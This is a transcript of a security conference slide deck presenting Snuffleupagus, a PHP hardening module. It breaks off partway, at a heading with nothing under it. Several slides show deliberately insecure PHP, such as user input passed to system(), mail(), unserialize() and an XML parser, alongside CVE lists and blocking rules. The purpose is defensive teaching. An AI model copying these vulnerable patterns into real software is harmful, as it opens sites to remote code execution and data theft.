» snuffleupagus€¦ · in the security team. it's called nbs system and it's a hosting...
TRANSCRIPT
![Page 1: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/1.jpg)
» SnuFfLEupAGusA ghostly elephant, in your php stack, killing bug classes, defeating attacks, and virtual-patching what is remaining.
1 / 106
![Page 2: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/2.jpg)
» Bonjour
2 / 106
![Page 3: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/3.jpg)
» I'm sorry
3 / 106
![Page 4: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/4.jpg)
» Good eveningWe're glad to be hereWe're working at the same (French¹) companyIn the security team.It's called NBS SystemAnd it's a hosting company, you know, for websites.
¹ Hence our lovely accent.
4 / 106
![Page 5: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/5.jpg)
» What are we trying to solve?We're hosting a lot of various php applications, using CMS written by super-duper creative people, and we'd like to prevent our customers from beingpwned.
5 / 106
![Page 6: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/6.jpg)
» What we were doing so farWe have a lot of os-level hardening (grsecurity ♥)We have some custom IDSWe have a (cool) WAF called naxsi
But not everything is patchable with those, and we can not² touch the PHPcode.
¹ And to be honest, we don't want to.
6 / 106
![Page 7: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/7.jpg)
» Some words about php
Its syntax draws upon C, Java, and Perl, and is easy to learn. Themain goal of the language is to allow web developers to writedynamically generated web pages quickly, but you can do muchmore with PHP.
— the php documentation
7 / 106
![Page 8: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/8.jpg)
» Still words about php
Well, there were other factors in play there. htmlspecialchars was avery early function. Back when PHP had less than 100 functionsand the function hashing mechanism was strlen(). In order toget a nice hash distribution of function names across the variousfunction name lengths names were picked specifically to makethem fit into a specific length bucket.
— Rasmus Lerdorf, creator of PHP
8 / 106
![Page 9: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/9.jpg)
» Words about php, again
I don’t know how to stop it, there was never any intent to write aprogramming language […] I have absolutely no idea how to writea programming language, I just kept adding the next logical step onthe way.
— Rasmus Lerdorf, creator of PHP
9 / 106
![Page 10: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/10.jpg)
» Words about php, again, and again
I was really, really bad at writing parsers. I still am really bad atwriting parsers. — Rasmus Lerdorf, creator of PHP
10 / 106
![Page 11: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/11.jpg)
» Words about php, again, and again,and again
We have things like protected properties. We have abstractmethods. We have all this stuff that your computer science teachertold you you should be using. I don't care about this crap at all.
— Rasmus Lerdorf, creator of PHP
11 / 106
![Page 12: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/12.jpg)
» The saDnESs
Fig 5. We're dealing with this every day at work
12 / 106
![Page 13: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/13.jpg)
» By the way…The php way to kill bug classes is to (sometimes) add a warning to itsdocumentation, like this, about rand:
This function does not generate cryptographically secure values,and should not be used for cryptographic purposes. If youneed a cryptographically secure value, consider using random_int(),random_bytes(), or openssl_random_pseudo_bytes() instead.
13 / 106
![Page 14: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/14.jpg)
» Fortunately…Did we mention that anyone is able to add comments to the official PHPdocumentation?
If you are looking for generate a random expression, like passwordwith alphanumeric or any other character, use this function:
function GeraHash($qtd){ $Caracteres = 'ABCDEFGHIJKLMOPQRSTUVXWYZ0123456789'; $QuantidadeCaracteres = strlen($Caracteres); $QuantidadeCaracteres--;
$Hash=NULL; for($x=1;$x<=$qtd;$x++){ $Posicao = rand(0,$QuantidadeCaracteres); $Hash .= substr($Caracteres,$Posicao,1); }
return $Hash; }
14 / 106
![Page 15: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/15.jpg)
» StoRy tiME!
15 / 106
![Page 16: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/16.jpg)
» Your security team
Fig 1. The security team trying to improve the security of your website
16 / 106
![Page 17: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/17.jpg)
» Your blog
Fig 2. You know, the one based on a decade-old Drupal that cries for updates
17 / 106
![Page 18: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/18.jpg)
» Your management
Fig 3. But the management is telling you that you're not allowed to updateanything
18 / 106
![Page 19: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/19.jpg)
» Hackers
Fig 4. Your database is harvested on a monthly basis by hackers
19 / 106
![Page 20: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/20.jpg)
» Protections
Fig 5. "We have a fancy and expensive WAF, everything is ok"
20 / 106
![Page 21: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/21.jpg)
» Kiddies
Fig 6. A new Drupal vulnerability is published, kiddies are pwning everything
21 / 106
![Page 22: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/22.jpg)
» Your website is pwned
Fig 7. Your website is defaced with a big goatse
22 / 106
![Page 23: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/23.jpg)
» Customers are going away
Fig 8. The management is screaming around
23 / 106
![Page 24: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/24.jpg)
» Fixing the website
Fig 9. The security team spends the week-end removing webshells
24 / 106
![Page 25: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/25.jpg)
» So, what about hardening php itself?Suhosin did it, and it worked great, but we're in 2017 and
It has some useless featuresIt lacks some useful featuresIt's not very industrializable
Suhosin7 is not production-ready anyway :'(
25 / 106
![Page 26: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/26.jpg)
» So we thought about it, …
Fig 10. Us thinking about it.26 / 106
![Page 27: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/27.jpg)
» And wrote our own module!
Fig 11. Snuffleupagus
27 / 106
![Page 28: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/28.jpg)
» Snuffleupagus?!
Aloysius Snuffleupagus, more commonly known as Mr.Snuffleupagus, Snuffleupagus or Snuffy for short, is one of thecharacters on Sesame Street.
He was created as a woolly mammoth, without tusks or (visible)ears, and has a long thick pointed tail, similar in shape to that of adinosaur or other reptile.
— wikipedia
28 / 106
![Page 29: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/29.jpg)
» Why the Heffalump then?
Your slides are fun, and it's an elephant, so it's php related enough.
— a coworker of ours
And there was a picture of Winnie the Pooh in the talk about Turla!
29 / 106
![Page 30: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/30.jpg)
» PhP-leVEl viRtUaL paTcHInG
30 / 106
![Page 31: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/31.jpg)
» The issue
disable_function can globally forbid usage of arbitrary functionsYour CMS is using exec for its update mechanismEither forbid exec or keep your website up to dateThis is why we can't have nice things.
31 / 106
![Page 32: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/32.jpg)
» The saDnESs
Fig 12. A sad website awaiting its security updates
32 / 106
![Page 33: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/33.jpg)
» How we're helping
Disable system globally:
sp.disable_functions.function("system").drop();
Allows system calls in a specific file
sp.disable_functions.function("system").filename("up.php").allow();sp.disable_functions.function("system").drop();
Allow system calls in a file, with a matching sha256:
sp.disable_functions.function("system").filename("up.php").hash("13..a").allow();sp.disable_functions.function("system").drop();
We even provide a user-friendly script to generate a configuration file,freezing dangerous functions usage.
33 / 106
![Page 34: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/34.jpg)
» WhaT caN we do wiTh pHp-leVEl viRtUaL-pATcHinG?
34 / 106
![Page 35: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/35.jpg)
» About the syntax
We designed¹ the rules syntax like this:
24 different filtersDocumentation for everythingLots of examples
to be able to easily patch:
every wordpress CVE since 2010the RIPS advent calendara lot of high-profile web exploitsour own 0dayz ;)
¹ Designing configuration formats is awful, if you're wondering.
35 / 106
![Page 36: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/36.jpg)
» Examplessp.disable_function("PHPThingy::MyClass::method_one>internal_func").drop();sp.disable_function("admin_cron_thingy").cidr("127.0.0.1/32").allow();sp.disable_function("admin_cron_thingy").drop();sp.disable_function.function("render_tab3").var("_REQUEST[tab]").value_r("\"").drop();sp.disable_function.function("system").pos("0").value_r("[^a-z]").drop();
36 / 106
![Page 37: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/37.jpg)
» WhaT caN we do wiTh tHis?
37 / 106
![Page 38: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/38.jpg)
» system() injections
38 / 106
![Page 39: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/39.jpg)
» What the documentation is saying
When allowing user-supplied data to be passed to this function, useescapeshellarg() or escapeshellcmd() to ensure that users cannot trickthe system into executing arbitrary commands.
39 / 106
![Page 40: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/40.jpg)
» What people are doing
<?php$ip_addr = system("dig +short " . $_GET["address"]);echo "The ip adress of $_GET['address'] is $ip_addr";?>
40 / 106
![Page 41: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/41.jpg)
» What we're getting
CVE-2017-7692: Authen RCE on SquirrelMailCVE-2016-9565: Unauth RCE on Nagios CoreCVE-2014-1610: Unauth RCE on DokuWikiEvery single shitty modem/router/switch/IoT.
41 / 106
![Page 42: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/42.jpg)
» How we're (kinda) killing it
sp.disable_function.function("system").param("command").value_r("[$|;&\n`]").drop();
42 / 106
![Page 43: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/43.jpg)
» mail related RCE
43 / 106
![Page 44: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/44.jpg)
» What the documentation is saying
The additional_parameters parameter can be used to pass additionalflags as command line options to the program configured to beused when sending mail
Known since 2011, popularized by RIPS.
44 / 106
![Page 45: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/45.jpg)
» What people are doing
// Olol, sending some emailsmail(..., $_GET['a']);
45 / 106
![Page 46: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/46.jpg)
» What we're getting
CVE-2017-7692: Authen RCE in SquirrelMailCVE-2016-10074: RCE in SwiftMailerCVE-2016-10033: RCE in PHPMailerCVE-2016-9920: Unauth RCE in RoundcubeRCE in a lot of webmails
46 / 106
![Page 47: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/47.jpg)
» How we're (kinda) killing it
sp.disable_function.function("mail").param("additional_parameters").value_r("\-").drop
47 / 106
![Page 48: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/48.jpg)
» WriTInG ruLEs
Fig 13. When the security team realises that it needs to write a lot of rules.
48 / 106
![Page 49: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/49.jpg)
» Ain'T noBOdY haS tiME towRitE ruLEs
49 / 106
![Page 50: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/50.jpg)
» Dead bug classes
Fig 14. The security team dancing over dead bugs
50 / 106
![Page 51: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/51.jpg)
» Session-cookie stealing via XSSLike suhosin, we're encrypting cookies with a secret key tied to:
The user-agent of the clientA static keyAnd environnment variable tat you can set to:
The ip address¹The TLS extended master key…
¹ Not the best idea ever: in 2017, people are roaming a lot.
51 / 106
![Page 52: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/52.jpg)
» Misc cookies thingsIf you're coming over https, your cookies get the secure flagIf cookies are encrypted, they are httpOnlyYou can set the samesite option on cookies, to kill CSRF¹
¹ Kudos to my intern, Sylvain Lefevre, for implementing this ♥.
52 / 106
![Page 53: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/53.jpg)
» RCE via file-upload
53 / 106
![Page 54: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/54.jpg)
» What the documentation is saying
Not validating which file you operate on may mean that users canaccess sensitive information in other directories.
54 / 106
![Page 55: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/55.jpg)
» What people are doing
$uploaddir = '/var/www/uploads/';$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)
55 / 106
![Page 56: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/56.jpg)
» What we're getting
CVE-2001-1032 : RCE in PHP-Nuke via file-upload...15 years later...CVE-2016-9187 : RCE in Moodle via file-upload
There are 850 CVE entries that match your search — cve.mitre.org
56 / 106
![Page 57: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/57.jpg)
» How we're killing it
Suhosin style:
sp.upload_validation.script("tests/upload_validation.sh").enable();
One trick is to rely on vld¹ to ensure file doesn't contain php code:
$ php -d vld.execute=0 -d vld.active=1 -d extension=vld.so $file
¹ Vulcan Logic Disassembler. (yes)
57 / 106
![Page 58: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/58.jpg)
» Unserialize
58 / 106
![Page 59: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/59.jpg)
» What the documentation is saying
Do not pass untrusted user input to unserialize() [...].Unserialization can result in code being loaded and executed [...].
59 / 106
![Page 60: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/60.jpg)
» What people are doing
$my_object = unserialize($_GET['o']);
60 / 106
![Page 61: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/61.jpg)
» What we're getting
CVE-2016-????: Unauth RCE in Observium (leading to remote root)CVE-2016-5726: Unauth RCE in Simple Machines ForumsCVE-2016-4010: Unauth RCE in MagentoCVE-2017-2641: Unauth RCE in MoodleCVE-2015-8562: Unauth RCE in JoomlaCVE-2015-7808: Unauth RCE in vBulletinCVE-2014-1691: Unauth RCE in HordeCVE-2012-5692: unauth RCE in IP.Board
61 / 106
![Page 62: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/62.jpg)
» How we're killing it
Php will discard any garbage found at the end of a serialized object: we'resimply appending a hmac at the end of strings generated by serialize.
It looks like this:
s:1:"a";650609b417904d0d9bbf1fc44a975d13ecdf6b02b715c1a06271fb3b673f25b1
62 / 106
![Page 63: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/63.jpg)
» rand and its friends
63 / 106
![Page 64: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/64.jpg)
» What the documentation is saying
This function does not generate cryptographically secure values,and should not be used for cryptographic purposes.
64 / 106
![Page 65: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/65.jpg)
» What people are doing
$password_reset_token = rand(1,9) . rand(1,9) . [...] . rand(1, 9);
65 / 106
![Page 66: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/66.jpg)
» What we're getting
CVE-2015-5267: Auth bypass in MoodleCVE-2008-4102: Auth bypass in JoomlaVarious captcha bypasses
66 / 106
![Page 67: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/67.jpg)
» How we're killing it
We're simply replacing every call to rand and mt_rand with random_int.
67 / 106
![Page 68: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/68.jpg)
» XXE
68 / 106
![Page 69: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/69.jpg)
» What the documentation is saying
Not a single warning ;)
69 / 106
![Page 70: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/70.jpg)
» Nothing about XXE
Fig 4. At least it's not enabled by default¹
¹ For certain XML parsers, not all of them.
70 / 106
![Page 71: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/71.jpg)
» What people are doing
$xmlfile = file_get_contents('php://input');$dom = new DOMDocument();$dom->loadXML($xmlfile);$data = simplexml_import_dom($dom);
71 / 106
![Page 72: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/72.jpg)
» What we're getting
CVE-2015-5161: Unauth arbitrary file reading on MagentoCVE-2014-8790: Unauth RCE in GetSimple CMSCVE-2011-4107: Authen LFI in PHPMyAdmin
72 / 106
![Page 73: » SnuFfLEupAGus€¦ · In the security team. It's called NBS System And it's a hosting company, you know, for websites. ¹ Hence our lovely accent. 4 / 106 » What are we trying](https://reader035.vdocument.in/reader035/viewer/2022070816/5f0fe5b37e708231d4466e12/html5/thumbnails/73.jpg)
» How we're killing it
